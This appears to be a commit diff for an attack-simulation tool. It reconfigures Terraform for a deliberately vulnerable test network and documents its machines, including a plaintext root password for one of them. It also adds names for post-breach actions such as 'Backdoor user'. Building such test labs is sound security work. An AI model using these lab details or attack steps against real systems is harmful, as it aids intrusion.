forked from p15670423/monkey
commit 5754ec6044
|
@ -22,7 +22,7 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
|
|||
# Other directories and paths (most likely you don't need to configure)
|
||||
$MONKEY_ISLAND_DIR = "\monkey\monkey_island"
|
||||
$MONKEY_DIR = "\monkey\infection_monkey"
|
||||
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\monkey_utils\sambacry_monkey_runner"
|
||||
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner"
|
||||
$PYTHON_DLL = "C:\Windows\System32\python27.dll"
|
||||
$MK32_DLL = "mk32.dll"
|
||||
$MK64_DLL = "mk64.dll"
|
||||
|
|
|
@ -129,7 +129,7 @@ python -m pip install --user -r requirements_linux.txt || handle_error
|
|||
# Build samba
|
||||
log_message "Building samba binaries"
|
||||
sudo apt-get install gcc-multilib
|
||||
cd ${monkey_home}/monkey/infection_monkey/monkey_utils/sambacry_monkey_runner
|
||||
cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner
|
||||
sudo chmod +x ./build.sh || handle_error
|
||||
./build.sh
|
||||
|
||||
|
|
|
@ -58,7 +58,7 @@ Requirements:
|
|||
To deploy:
|
||||
1. Configure service account for your project:
|
||||
|
||||
a. Create a service account and name it “your\_name-monkeyZoo-user”
|
||||
a. Create a service account (GCP website -> IAM -> service accounts) and name it “your\_name-monkeyZoo-user”
|
||||
|
||||
b. Give these permissions to your service account:
|
||||
|
||||
|
@ -74,7 +74,7 @@ To deploy:
|
|||
|
||||
**Project -> Owner**
|
||||
|
||||
c. Download its **Service account key**. Select JSON format.
|
||||
c. Download its **Service account key** in JSON and place it in **/gcp_keys** as **gcp_key.json**.
|
||||
2. Get these permissions in monkeyZoo project for your service account (ask monkey developers to add them):
|
||||
|
||||
a. **Compute Engine -\> Compute image user**
|
||||
|
@ -82,20 +82,30 @@ To deploy:
|
|||
../monkey/envs/monkey\_zoo/terraform/config.tf file (don’t forget to
|
||||
link to your service account key file):
|
||||
|
||||
> provider "google" {
|
||||
>
|
||||
> project = "project-28054666"
|
||||
>
|
||||
> region = "europe-west3"
|
||||
>
|
||||
> zone = "europe-west3-b"
|
||||
>
|
||||
> credentials = "${file("project-92050661-9dae6c5a02fc.json")}"
|
||||
>
|
||||
> }
|
||||
>
|
||||
> service\_account\_email="test@project-925243.iam.gserviceaccount.com"
|
||||
|
||||
provider "google" {
|
||||
|
||||
project = "test-000000" // Change to your project id
|
||||
|
||||
region = "europe-west3" // Change to your desired region or leave default
|
||||
|
||||
zone = "europe-west3-b" // Change to your desired zone or leave default
|
||||
|
||||
credentials = "${file("../gcp_keys/gcp_key.json")}" // Change to the location and name of the service key.
|
||||
// If you followed the instructions above, leave it as is
|
||||
|
||||
}
|
||||
|
||||
locals {
|
||||
|
||||
resource_prefix = "" // All of the resources will have this prefix.
|
||||
// Only change if you want to have multiple zoos in the same project
|
||||
|
||||
service_account_email="tester-monkeyZoo-user@testproject-000000.iam.gserviceaccount.com" // Service account email
|
||||
|
||||
monkeyzoo_project="guardicore-22050661" // Project where monkeyzoo images are kept. Leave as is.
|
||||
|
||||
}
|
||||
|
||||
4. Run terraform init
|
||||
|
||||
To deploy the network run:<br>
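A sketch of the usual Terraform commands from this point, run inside ../monkey/envs/monkey_zoo/terraform (flags left at their defaults; adjust to your setup):

    terraform plan    (review the networks and instances that will be created)
    terraform apply   (create them; confirm with "yes" when prompted)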
|
||||
|
@ -500,6 +510,42 @@ fullTest.conf is a good config to start, because it covers all machines.
|
|||
</tbody>
|
||||
</table>
|
||||
|
||||
<table>
|
||||
<thead>
|
||||
<tr class="header">
|
||||
<th><p><span id="_Toc536021463" class="anchor"></span>Nr. <strong>11</strong> Tunneling M3</p>
|
||||
<p>(10.2.0.11)</p></th>
|
||||
<th>(Exploitable)</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
<tr class="odd">
|
||||
<td>OS:</td>
|
||||
<td><strong>Ubuntu 16.04.05 x64</strong></td>
|
||||
</tr>
|
||||
<tr class="even">
|
||||
<td>Software:</td>
|
||||
<td>OpenSSL</td>
|
||||
</tr>
|
||||
<tr class="odd">
|
||||
<td>Default service’s port:</td>
|
||||
<td>22</td>
|
||||
</tr>
|
||||
<tr class="even">
|
||||
<td>Root password:</td>
|
||||
<td>3Q=(Ge(+&w]*</td>
|
||||
</tr>
|
||||
<tr class="odd">
|
||||
<td>Server’s config:</td>
|
||||
<td>Default</td>
|
||||
</tr>
|
||||
<tr class="even">
|
||||
<td>Notes:</td>
|
||||
<td>Accessible only through Nr. 10</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
|
||||
<table>
|
||||
<thead>
|
||||
<tr class="header">
|
||||
|
|
|
@ -2,9 +2,10 @@ provider "google" {
|
|||
project = "test-000000"
|
||||
region = "europe-west3"
|
||||
zone = "europe-west3-b"
|
||||
credentials = "${file("testproject-000000-0c0b000b00c0.json")}"
|
||||
credentials = "${file("../gcp_keys/gcp_key.json")}"
|
||||
}
|
||||
locals {
|
||||
resource_prefix = ""
|
||||
service_account_email="tester-monkeyZoo-user@testproject-000000.iam.gserviceaccount.com"
|
||||
monkeyzoo_project="guardicore-22050661"
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
resource "google_compute_firewall" "islands-in" {
|
||||
name = "islands-in"
|
||||
name = "${local.resource_prefix}islands-in"
|
||||
network = "${google_compute_network.monkeyzoo.name}"
|
||||
|
||||
allow {
|
||||
|
@ -13,7 +13,7 @@ resource "google_compute_firewall" "islands-in" {
|
|||
}
|
||||
|
||||
resource "google_compute_firewall" "islands-out" {
|
||||
name = "islands-out"
|
||||
name = "${local.resource_prefix}islands-out"
|
||||
network = "${google_compute_network.monkeyzoo.name}"
|
||||
|
||||
allow {
|
||||
|
@ -26,7 +26,7 @@ resource "google_compute_firewall" "islands-out" {
|
|||
}
|
||||
|
||||
resource "google_compute_firewall" "monkeyzoo-in" {
|
||||
name = "monkeyzoo-in"
|
||||
name = "${local.resource_prefix}monkeyzoo-in"
|
||||
network = "${google_compute_network.monkeyzoo.name}"
|
||||
|
||||
allow {
|
||||
|
@ -35,11 +35,11 @@ resource "google_compute_firewall" "monkeyzoo-in" {
|
|||
|
||||
direction = "INGRESS"
|
||||
priority = "65534"
|
||||
source_ranges = ["10.2.2.0/24"]
|
||||
source_ranges = ["10.2.2.0/24", "10.2.1.0/27"]
|
||||
}
|
||||
|
||||
resource "google_compute_firewall" "monkeyzoo-out" {
|
||||
name = "monkeyzoo-out"
|
||||
name = "${local.resource_prefix}monkeyzoo-out"
|
||||
network = "${google_compute_network.monkeyzoo.name}"
|
||||
|
||||
allow {
|
||||
|
@ -48,11 +48,11 @@ resource "google_compute_firewall" "monkeyzoo-out" {
|
|||
|
||||
direction = "EGRESS"
|
||||
priority = "65534"
|
||||
destination_ranges = ["10.2.2.0/24"]
|
||||
destination_ranges = ["10.2.2.0/24", "10.2.1.0/27"]
|
||||
}
|
||||
|
||||
resource "google_compute_firewall" "tunneling-in" {
|
||||
name = "tunneling-in"
|
||||
name = "${local.resource_prefix}tunneling-in"
|
||||
network = "${google_compute_network.tunneling.name}"
|
||||
|
||||
allow {
|
||||
|
@ -60,11 +60,11 @@ resource "google_compute_firewall" "tunneling-in" {
|
|||
}
|
||||
|
||||
direction = "INGRESS"
|
||||
source_ranges = ["10.2.1.0/28"]
|
||||
source_ranges = ["10.2.2.0/24", "10.2.0.0/28"]
|
||||
}
|
||||
|
||||
resource "google_compute_firewall" "tunneling-out" {
|
||||
name = "tunneling-out"
|
||||
name = "${local.resource_prefix}tunneling-out"
|
||||
network = "${google_compute_network.tunneling.name}"
|
||||
|
||||
allow {
|
||||
|
@ -72,5 +72,28 @@ resource "google_compute_firewall" "tunneling-out" {
|
|||
}
|
||||
|
||||
direction = "EGRESS"
|
||||
destination_ranges = ["10.2.1.0/28"]
|
||||
destination_ranges = ["10.2.2.0/24", "10.2.0.0/28"]
|
||||
}
|
||||
resource "google_compute_firewall" "tunneling2-in" {
|
||||
name = "${local.resource_prefix}tunneling2-in"
|
||||
network = "${google_compute_network.tunneling2.name}"
|
||||
|
||||
allow {
|
||||
protocol = "all"
|
||||
}
|
||||
|
||||
direction = "INGRESS"
|
||||
source_ranges = ["10.2.1.0/27"]
|
||||
}
|
||||
|
||||
resource "google_compute_firewall" "tunneling2-out" {
|
||||
name = "${local.resource_prefix}tunneling2-out"
|
||||
network = "${google_compute_network.tunneling2.name}"
|
||||
|
||||
allow {
|
||||
protocol = "all"
|
||||
}
|
||||
|
||||
direction = "EGRESS"
|
||||
destination_ranges = ["10.2.1.0/27"]
|
||||
}
|
||||
|
|
|
@ -26,23 +26,27 @@ data "google_compute_image" "shellshock-8" {
|
|||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "tunneling-9" {
|
||||
name = "tunneling-9-v2"
|
||||
name = "tunneling-9"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "tunneling-10" {
|
||||
name = "tunneling-10-v2"
|
||||
name = "tunneling-10"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "tunneling-11" {
|
||||
name = "tunneling-11"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "sshkeys-11" {
|
||||
name = "sshkeys-11-v2"
|
||||
name = "sshkeys-11"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "sshkeys-12" {
|
||||
name = "sshkeys-12-v2"
|
||||
name = "sshkeys-12"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "mimikatz-14" {
|
||||
name = "mimikatz-14-v2"
|
||||
name = "mimikatz-14"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "mimikatz-15" {
|
||||
|
@ -58,7 +62,7 @@ data "google_compute_image" "weblogic-18" {
|
|||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "weblogic-19" {
|
||||
name = "weblogic-19-v2"
|
||||
name = "weblogic-19"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "smb-20" {
|
||||
|
@ -78,7 +82,7 @@ data "google_compute_image" "struts2-23" {
|
|||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "struts2-24" {
|
||||
name = "struts-24-v2"
|
||||
name = "struts2-24"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
data "google_compute_image" "island-linux-250" {
|
||||
|
@ -88,4 +92,4 @@ data "google_compute_image" "island-linux-250" {
|
|||
data "google_compute_image" "island-windows-251" {
|
||||
name = "island-windows-251"
|
||||
project = "${local.monkeyzoo_project}"
|
||||
}
|
||||
}
|
||||
|
|
|
@ -6,29 +6,40 @@ locals {
|
|||
}
|
||||
|
||||
resource "google_compute_network" "monkeyzoo" {
|
||||
name = "monkeyzoo"
|
||||
name = "${local.resource_prefix}monkeyzoo"
|
||||
auto_create_subnetworks = false
|
||||
}
|
||||
|
||||
resource "google_compute_network" "tunneling" {
|
||||
name = "tunneling"
|
||||
name = "${local.resource_prefix}tunneling"
|
||||
auto_create_subnetworks = false
|
||||
}
|
||||
|
||||
resource "google_compute_network" "tunneling2" {
|
||||
name = "${local.resource_prefix}tunneling2"
|
||||
auto_create_subnetworks = false
|
||||
}
|
||||
|
||||
resource "google_compute_subnetwork" "monkeyzoo-main" {
|
||||
name = "monkeyzoo-main"
|
||||
name = "${local.resource_prefix}monkeyzoo-main"
|
||||
ip_cidr_range = "10.2.2.0/24"
|
||||
network = "${google_compute_network.monkeyzoo.self_link}"
|
||||
}
|
||||
|
||||
resource "google_compute_subnetwork" "tunneling-main" {
|
||||
name = "tunneling-main"
|
||||
name = "${local.resource_prefix}tunneling-main"
|
||||
ip_cidr_range = "10.2.1.0/28"
|
||||
network = "${google_compute_network.tunneling.self_link}"
|
||||
}
|
||||
|
||||
resource "google_compute_subnetwork" "tunneling2-main" {
|
||||
name = "${local.resource_prefix}tunneling2-main"
|
||||
ip_cidr_range = "10.2.0.0/27"
|
||||
network = "${google_compute_network.tunneling2.self_link}"
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "hadoop-2" {
|
||||
name = "hadoop-2"
|
||||
name = "${local.resource_prefix}hadoop-2"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -37,7 +48,7 @@ resource "google_compute_instance_from_template" "hadoop-2" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.2"
|
||||
}
|
||||
// Add required ssh keys for hadoop service and restart it
|
||||
|
@ -45,7 +56,7 @@ resource "google_compute_instance_from_template" "hadoop-2" {
|
|||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "hadoop-3" {
|
||||
name = "hadoop-3"
|
||||
name = "${local.resource_prefix}hadoop-3"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -54,13 +65,13 @@ resource "google_compute_instance_from_template" "hadoop-3" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.3"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "elastic-4" {
|
||||
name = "elastic-4"
|
||||
name = "${local.resource_prefix}elastic-4"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -69,13 +80,13 @@ resource "google_compute_instance_from_template" "elastic-4" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.4"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "elastic-5" {
|
||||
name = "elastic-5"
|
||||
name = "${local.resource_prefix}elastic-5"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -84,14 +95,14 @@ resource "google_compute_instance_from_template" "elastic-5" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.5"
|
||||
}
|
||||
}
|
||||
|
||||
/* Couldn't find ubuntu packages for required samba version (too old).
|
||||
resource "google_compute_instance_from_template" "sambacry-6" {
|
||||
name = "sambacry-6"
|
||||
name = "${local.resource_prefix}sambacry-6"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -99,7 +110,7 @@ resource "google_compute_instance_from_template" "sambacry-6" {
|
|||
}
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.6"
|
||||
}
|
||||
}
|
||||
|
@ -107,7 +118,7 @@ resource "google_compute_instance_from_template" "sambacry-6" {
|
|||
|
||||
/* We need custom 32 bit Ubuntu machine for this (there are no 32 bit ubuntu machines in GCP).
|
||||
resource "google_compute_instance_from_template" "sambacry-7" {
|
||||
name = "sambacry-7"
|
||||
name = "${local.resource_prefix}sambacry-7"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk {
|
||||
initialize_params {
|
||||
|
@ -116,14 +127,14 @@ resource "google_compute_instance_from_template" "sambacry-7" {
|
|||
}
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.7"
|
||||
}
|
||||
}
|
||||
*/
|
||||
|
||||
resource "google_compute_instance_from_template" "shellshock-8" {
|
||||
name = "shellshock-8"
|
||||
name = "${local.resource_prefix}shellshock-8"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -132,13 +143,13 @@ resource "google_compute_instance_from_template" "shellshock-8" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.8"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "tunneling-9" {
|
||||
name = "tunneling-9"
|
||||
name = "${local.resource_prefix}tunneling-9"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -147,18 +158,17 @@ resource "google_compute_instance_from_template" "tunneling-9" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="tunneling-main"
|
||||
subnetwork="${local.resource_prefix}tunneling-main"
|
||||
network_ip="10.2.1.9"
|
||||
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.9"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "tunneling-10" {
|
||||
name = "tunneling-10"
|
||||
name = "${local.resource_prefix}tunneling-10"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -167,13 +177,32 @@ resource "google_compute_instance_from_template" "tunneling-10" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="tunneling-main"
|
||||
subnetwork="${local.resource_prefix}tunneling-main"
|
||||
network_ip="10.2.1.10"
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="${local.resource_prefix}tunneling2-main"
|
||||
network_ip="10.2.0.10"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "tunneling-11" {
|
||||
name = "${local.resource_prefix}tunneling-11"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
image = "${data.google_compute_image.tunneling-11.self_link}"
|
||||
}
|
||||
auto_delete = true
|
||||
}
|
||||
network_interface{
|
||||
subnetwork="${local.resource_prefix}tunneling2-main"
|
||||
network_ip="10.2.0.11"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "sshkeys-11" {
|
||||
name = "sshkeys-11"
|
||||
name = "${local.resource_prefix}sshkeys-11"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -182,13 +211,13 @@ resource "google_compute_instance_from_template" "sshkeys-11" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.11"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "sshkeys-12" {
|
||||
name = "sshkeys-12"
|
||||
name = "${local.resource_prefix}sshkeys-12"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -197,14 +226,14 @@ resource "google_compute_instance_from_template" "sshkeys-12" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.12"
|
||||
}
|
||||
}
|
||||
|
||||
/*
|
||||
resource "google_compute_instance_from_template" "rdpgrinder-13" {
|
||||
name = "rdpgrinder-13"
|
||||
name = "${local.resource_prefix}rdpgrinder-13"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -212,14 +241,14 @@ resource "google_compute_instance_from_template" "rdpgrinder-13" {
|
|||
}
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.13"
|
||||
}
|
||||
}
|
||||
*/
|
||||
|
||||
resource "google_compute_instance_from_template" "mimikatz-14" {
|
||||
name = "mimikatz-14"
|
||||
name = "${local.resource_prefix}mimikatz-14"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -228,13 +257,13 @@ resource "google_compute_instance_from_template" "mimikatz-14" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.14"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "mimikatz-15" {
|
||||
name = "mimikatz-15"
|
||||
name = "${local.resource_prefix}mimikatz-15"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -243,13 +272,13 @@ resource "google_compute_instance_from_template" "mimikatz-15" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.15"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "mssql-16" {
|
||||
name = "mssql-16"
|
||||
name = "${local.resource_prefix}mssql-16"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -258,14 +287,14 @@ resource "google_compute_instance_from_template" "mssql-16" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.16"
|
||||
}
|
||||
}
|
||||
|
||||
/* We need to alter monkey's behavior for this to upload 32-bit monkey instead of 64-bit (not yet developed)
|
||||
resource "google_compute_instance_from_template" "upgrader-17" {
|
||||
name = "upgrader-17"
|
||||
name = "${local.resource_prefix}upgrader-17"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -273,7 +302,7 @@ resource "google_compute_instance_from_template" "upgrader-17" {
|
|||
}
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.17"
|
||||
access_config {
|
||||
// Cheaper, non-premium routing
|
||||
|
@ -284,7 +313,7 @@ resource "google_compute_instance_from_template" "upgrader-17" {
|
|||
*/
|
||||
|
||||
resource "google_compute_instance_from_template" "weblogic-18" {
|
||||
name = "weblogic-18"
|
||||
name = "${local.resource_prefix}weblogic-18"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -293,13 +322,13 @@ resource "google_compute_instance_from_template" "weblogic-18" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.18"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "weblogic-19" {
|
||||
name = "weblogic-19"
|
||||
name = "${local.resource_prefix}weblogic-19"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -308,13 +337,13 @@ resource "google_compute_instance_from_template" "weblogic-19" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.19"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "smb-20" {
|
||||
name = "smb-20"
|
||||
name = "${local.resource_prefix}smb-20"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -323,13 +352,13 @@ resource "google_compute_instance_from_template" "smb-20" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.20"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "scan-21" {
|
||||
name = "scan-21"
|
||||
name = "${local.resource_prefix}scan-21"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -338,13 +367,13 @@ resource "google_compute_instance_from_template" "scan-21" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.21"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "scan-22" {
|
||||
name = "scan-22"
|
||||
name = "${local.resource_prefix}scan-22"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -353,13 +382,13 @@ resource "google_compute_instance_from_template" "scan-22" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.22"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "struts2-23" {
|
||||
name = "struts2-23"
|
||||
name = "${local.resource_prefix}struts2-23"
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -368,13 +397,13 @@ resource "google_compute_instance_from_template" "struts2-23" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.23"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "struts2-24" {
|
||||
name = "struts2-24"
|
||||
name = "${local.resource_prefix}struts2-24"
|
||||
source_instance_template = "${local.default_windows}"
|
||||
boot_disk{
|
||||
initialize_params {
|
||||
|
@ -383,13 +412,13 @@ resource "google_compute_instance_from_template" "struts2-24" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.24"
|
||||
}
|
||||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "island-linux-250" {
|
||||
name = "island-linux-250"
|
||||
name = "${local.resource_prefix}island-linux-250"
|
||||
machine_type = "n1-standard-2"
|
||||
tags = ["island", "linux", "ubuntu16"]
|
||||
source_instance_template = "${local.default_ubuntu}"
|
||||
|
@ -400,7 +429,7 @@ resource "google_compute_instance_from_template" "island-linux-250" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.250"
|
||||
access_config {
|
||||
// Cheaper, non-premium routing (not available in some regions)
|
||||
|
@ -410,7 +439,7 @@ resource "google_compute_instance_from_template" "island-linux-250" {
|
|||
}
|
||||
|
||||
resource "google_compute_instance_from_template" "island-windows-251" {
|
||||
name = "island-windows-251"
|
||||
name = "${local.resource_prefix}island-windows-251"
|
||||
machine_type = "n1-standard-2"
|
||||
tags = ["island", "windows", "windowsserver2016"]
|
||||
source_instance_template = "${local.default_windows}"
|
||||
|
@ -421,11 +450,11 @@ resource "google_compute_instance_from_template" "island-windows-251" {
|
|||
auto_delete = true
|
||||
}
|
||||
network_interface {
|
||||
subnetwork="monkeyzoo-main"
|
||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
||||
network_ip="10.2.2.251"
|
||||
access_config {
|
||||
// Cheaper, non-premium routing (not available in some regions)
|
||||
// network_tier = "STANDARD"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
resource "google_compute_instance_template" "ubuntu16" {
|
||||
name = "ubuntu16"
|
||||
name = "${local.resource_prefix}ubuntu16"
|
||||
description = "Creates ubuntu 16.04 LTS servers at europe-west3-a."
|
||||
|
||||
tags = ["test-machine", "ubuntu16", "linux"]
|
||||
|
@ -24,7 +24,7 @@ resource "google_compute_instance_template" "ubuntu16" {
|
|||
}
|
||||
|
||||
resource "google_compute_instance_template" "windows2016" {
|
||||
name = "windows2016"
|
||||
name = "${local.resource_prefix}windows2016"
|
||||
description = "Creates windows 2016 core servers at europe-west3-a."
|
||||
|
||||
tags = ["test-machine", "windowsserver2016", "windows"]
|
||||
|
@ -42,4 +42,4 @@ resource "google_compute_instance_template" "windows2016" {
|
|||
email="${local.service_account_email}"
|
||||
scopes=["cloud-platform"]
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -0,0 +1,3 @@
|
|||
POST_BREACH_COMMUNICATE_AS_NEW_USER = "Communicate as new user"
|
||||
POST_BREACH_BACKDOOR_USER = "Backdoor user"
|
||||
POST_BREACH_FILE_EXECUTION = "File execution"
|
|
